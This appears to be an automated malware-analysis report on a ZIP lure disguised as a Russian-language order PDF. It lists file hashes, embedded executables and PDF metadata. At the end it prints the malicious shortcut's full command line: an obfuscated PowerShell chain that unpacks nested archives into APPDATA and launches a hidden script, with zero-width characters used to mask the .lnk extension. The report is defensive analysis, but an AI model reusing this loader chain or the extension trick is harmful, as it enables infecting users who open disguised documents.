Infection Chain
Summary by MalvaGPT
Characteristics
Hash     Hash Value
MD5      4b94efa49fb59a43ac4a9fdf04c87ef6
SHA1     3d27e65ae5cb7aba8c529c8010b2414f24e4122b
SHA256   fe0d64d07ef03b2db6a7fa1ccbcc62c3f24f003d5f5726129ff22341321575b4
SHA384   c323040e6c4781e9c11aae78d12b763352f034702b323535ae13aeeb1382204c16c4e9f124824f4d01d1657c631360af
SHA512   63fda209808d66c4bce6d9550250217f1300cb57d6eeeefb8aa9d7da222a92bbb2ea96a43995be9a821303cd4656209810cf54e6f7aaa49681a71f50f19a32e5
SSDeep   393216:7xEj7DApaIMrPv0XmGWK4bEv7o7EPQGgdl:VE7G2GIg79Hkl
TLSH     30D633FE6BD2414A9B6221BBB0684FA0723041B47A098450FD97C7E9F2576D98B13CF7
File Structure
FOUND.000
primaryOutputCount
defaultDetailOutput
previousCommentCode
listFeedbackList
inactiveLabelResponse.xml
activeOutputPeriod.pub
[Authenticode]_681ef6a5.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0002
ID:1033
[Authenticode]_98ba5cdb.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.xdata
.idata
.reloc
.symtab
externalTagName
activeOptionStatus
activeResourceList
activeOutputPeriod
primaryTaskName.xml
primaryPictureLimit
Proekt_prikaza_681_o_pooshrenii.pdf
#Stream {38}
#Stream {1260}
#Stream {1261}
#Stream {1262}
#Stream {1263}
#Stream {1264}
#Stream {1265}
#Stream {1266}
#Stream {1267}
#Stream {146}
#Stream {147}
#Stream {148}
#Stream {149}
#Stream {150}
#Stream {151}
#Stream {152}
#Stream {153}
#Stream {154}
#Stream {155}
#Stream {156}
#Stream {157}
#Stream {158}
#Stream {159}
#Stream {160}
#Stream {161}
#Stream {162}
#Stream {163}
#Stream {164}
#Stream {1273}
#Stream {1268}
#Stream {1269}
#Stream {1270}
#Stream {1271}
#Stream {1272}
Structure
[Authenticode]_a5d98da1.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.buildid
.data
.pdata
.rodata
.tls
.reloc
[Authenticode]_d068fa0a.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
_RDATA
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
finalActionCategory
lastCssName
nextValueDate
Information
Name                                  Value
Proekt_prikaza_681_o_pooshrenii.pdf   1.7
Proekt_prikaza_681_o_pooshrenii.pdf   1
Proekt_prikaza_681_o_pooshrenii.pdf   D:20241031010650-07'00'
Proekt_prikaza_681_o_pooshrenii.pdf   Acrobat PDFMaker 22 for Word
Proekt_prikaza_681_o_pooshrenii.pdf   (empty)
Proekt_prikaza_681_o_pooshrenii.pdf   D:20251212064115-08'00'
Proekt_prikaza_681_o_pooshrenii.pdf   (empty)
Proekt_prikaza_681_o_pooshrenii.pdf   П Р И К А З
Proekt_prikaza_681_o_pooshrenii.pdf   Adobe PDF Library 22.1.117
Proekt_prikaza_681_o_pooshrenii.pdf   1
Proekt_prikaza_681_o_pooshrenii.pdf   MoBIL GROUP
Proekt_prikaza_681_o_pooshrenii.pdf   D:20241031010650-07'00'
Proekt_prikaza_681_o_pooshrenii.pdf   Acrobat PDFMaker 22 for Word
Proekt_prikaza_681_o_pooshrenii.pdf   (empty)
Proekt_prikaza_681_o_pooshrenii.pdf   D:20251212064115-08'00'
Proekt_prikaza_681_o_pooshrenii.pdf   Adobe PDF Library 22.1.117
Proekt_prikaza_681_o_pooshrenii.pdf   D:20241031080647
Proekt_prikaza_681_o_pooshrenii.pdf   (empty)


4b94efa49fb59a43ac4a9fdf04c87ef6 (12.85 MB)
Characteristics
No malware configuration was found at this point.
Artefacts

Name:     LNK: Command Execution
Verdict:  Malicious
Location: 4b94efa49fb59a43ac4a9fdf04c87ef6 > Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk
          (the captured file name contains zero-width characters around "pdf", which are invisible when rendered)
Value:
powershell.exe $externalModeType=([array](where.exe /r $env:USERPROFILE 'Proekt_prikaza_681_o_pooshrenii.zip'))[0].Trim(); &("Exp" + "and" + "-Arc" + "hive") $externalModeType -D $env:APPDATA\totalValueThreshold; $externalModeType=$env:APPDATA+'\totalValueThreshold\FOUND.000\inactiveLinkOutput'; $visibleHtmlCount=$externalModeType+'.zip'; ren $externalModeType -N $visibleHtmlCount; &("Exp" + "and" + "-Arc" + "hive") $visibleHtmlCount -D $env:APPDATA\davinciresolve; Start-Process -WindowStyle Hidden powershell (gc $env:APPDATA\davinciresolve\activeOptionStatus)

Name:     Deobfuscated PowerShell
Verdict:  Malicious
Location: 4b94efa49fb59a43ac4a9fdf04c87ef6 > Proekt_prikaza_681_o_pooshrenii.‌‌‌‌‌pdf‌.lnk > LNK CommandLine > [PowerShell Command]
Value:
(Get-Content $env:APPDATA\davinciresolve\activeOptionStatus)
